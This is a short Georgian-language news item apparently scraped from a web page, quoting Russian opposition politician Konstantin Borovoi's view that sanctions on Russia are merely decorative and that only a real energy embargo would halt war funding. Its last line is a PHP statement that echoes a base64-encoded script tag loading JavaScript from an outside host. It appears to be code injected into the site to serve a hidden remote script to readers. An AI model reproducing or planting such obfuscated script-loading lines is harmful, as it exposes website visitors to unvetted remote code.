celsiusi
ავერსი საქკაბელი
რუსეთის სახელმწიფო დუმის ყოფილი დეპუტატის, ოპოზიციონერი პოლიტიკოსი კონსტანტინ ბოროვოის განცხადებით, რუსეთის წინააღმდეგ დაწესებული სანქციები თანამედროვე დეკორაციული ხასიათისაა და ამ სანქციებისგან თავის დაღწევა მარტივია. ამის შესახებ მან რადიო "მაესტროსთან" ინტერვიუში რუსეთ–უკრაინის თემაზე საუბრისას განაცხადა. 
 
"პუტინი ამბობს, რომ ამ სანქციებს ის მოელოდა. ისიც უნდა ითქვას, რომ სამწუხაროდ, სანქციები თანამედროვე დეკორაციული ხასიათისაა, პუტინის ქალიშვილების წინააღმდეგ სანქციები, სანქციები ლავროვის მეუღლის და შვილის წინააღმდეგ, ოლიგარქების წინააღმდეგ დაწესებული სანქციბეი, რომლებსაც ირიბი შეხება აქვთ პუტინის გადაწყვეტილებებთან, აქედან გამომდინარე ვამბობ, რომ ეს სანქციები მაინც უფრო დეკორაციული, დემონსტრაციულია, ამ სანქციებისგან თავის დაღწევა მარტივია. ამ ომის დახმარებით, პუტინი საკუთარ ძალაუფლებას და ხელისუფლებას ინარჩუნებს. ამ ხელისუფლების შესანარჩუნებლად კი მთავარია ორი მილსადენის ქონა - გაზის მილსადენი, რისი საშუალებითაც ინარჩუნებს მნიშვნელოვან ფინანსურ წყაროს -  ეს კი ხელს უწყობს ომის წარმოება. დღეს ამერიკის შეერთებული შტატები, პუტინს ყოველ დღე უხდიან ერთ მილიარდ დოლარს. გერმანია რუსეთს ნავთობზე და გაზზე ორასს მილიონ ევროს უხდის ყოველ დღე - ყოველ დღე! ომის დასრულება შეიძლება კიდევ სხვა გზით, თუ რეალურად იქნება შემოღებული რეალური ემბარგო, რის შედეგად ამ ომის დაფინანსება იქნება გაჩერებული. აღნიშნული საკითხი დასავლეთში დღეს განიხილება, როგორც გერმანიაში, ასევე ამერიკის შეერთებულ შტატებში, მაგრამ გადაწყვეტილების მისაღებად პოლიტიკური ნება დღეს არ არსებობს, სამწუხაროდ." – განაცხადა მან. 
 
 
690
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");